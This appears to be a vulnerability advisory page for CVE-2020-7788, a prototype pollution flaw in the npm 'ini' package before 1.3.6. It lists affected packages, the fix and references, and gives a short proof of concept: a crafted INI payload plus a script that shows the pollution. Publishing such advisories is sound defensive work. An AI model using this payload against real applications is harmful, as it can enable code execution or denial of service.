CVE-2020-7788: Prototype Pollution

Q: What is CVE-2020-7788?

CVE-2020-7788 is a Prototype Pollution vulnerability in the `ini` npm package.

Q: How severe is CVE-2020-7788?

CVE-2020-7788 has a severity rating of 9.8 (critical).

Q: Which software packages are affected by CVE-2020-7788?

The `ini` npm package before version 1.3.6 is affected, as well as certain versions of `nodejs-ini`, `nodejs-nodemon`, `rh-nodejs14-nodejs`, `rh-nodejs12-nodejs`, `rh-nodejs12-nodejs-nodemon`, and `rh-nodejs10-nodejs`.

Q: How can CVE-2020-7788 be fixed?

To fix CVE-2020-7788, upgrade to version 1.3.6 of the `ini` package.

Q: Where can I find more information about CVE-2020-7788?

More information about CVE-2020-7788 can be found at the following references: [GitHub](https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1), [npm](https://www.npmjs.com/advisories/1589), [Snyk](https://snyk.io/vuln/SNYK-JS-INI-1048974).

Published Dec 8, 2020

Updated

Overview The ini npm package before version 1.3.6 has a Prototype Pollution vulnerability.

If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.

Patches

This has been patched in 1.3.6.

Steps to reproduce

payload.ini [proto] polluted = "polluted"

poc.js: var fs = require('fs') var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8')) console.log(parsed) console.log(parsed.proto) console.log(polluted)

> node poc.js {} { polluted: 'polluted' } { polluted: 'polluted' } polluted

Other sources

A flaw was found in nodejs-ini. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.

Node.js ini module could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution flaw. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service condition on the system.

— IBM

This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.

Affected Software

17 affected componentsFixes available

npm/ini<1.3.6

1.3.6

redhat/nodejs-nodemon<0:2.0.19-1.el9_0

0:2.0.19-1.el9_0

redhat/rh-nodejs14-nodejs<0:14.15.4-2.el7

0:14.15.4-2.el7

redhat/rh-nodejs12-nodejs<0:12.20.1-1.el7

0:12.20.1-1.el7

redhat/rh-nodejs12-nodejs-nodemon<0:2.0.3-1.el7

0:2.0.3-1.el7

redhat/rh-nodejs10-nodejs<0:10.23.1-2.el7

0:10.23.1-2.el7

redhat/rh-nodejs14-nodejs-nodemon<0:2.0.3-5.el7

0:2.0.3-5.el7

redhat/rh-nodejs12-nodejs<0:12.22.5-1.el7

0:12.22.5-1.el7

redhat/rh-nodejs12-nodejs-nodemon<0:2.0.3-5.el7

0:2.0.3-5.el7

redhat/nodejs-ini<1.3.6

1.3.6

IBM Cloud Pak for Security (CP4S)<=1.6.0.1

IBM Cloud Pak for Security (CP4S)<=1.6.0.0

IBM Cloud Pak for Security (CP4S)<=1.5.0.1

IBM Cloud Pak for Security (CP4S)<=1.5.0.0

IBM Cloud Pak for Security (CP4S)<=1.4.0.0

Ini Project Ini Node.js<1.3.6

Debian Debian Linux=9.0

Remediation

Patch Available

https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1

Event History

Dec 8, 2020

CVE Published

12:00 AM

Dec 10, 2020

Advisory Published

04:53 PM

Dec 11, 2020

CVE Published

via MITRE·10:45 AM

Data Sourced

via MITRE·10:45 AM

DescriptionSeverityWeakness

Parent advisories

This vulnerability appears in the following advisories.

Frequently Asked Questions

What is CVE-2020-7788?

CVE-2020-7788 is a Prototype Pollution vulnerability in the `ini` npm package.

How severe is CVE-2020-7788?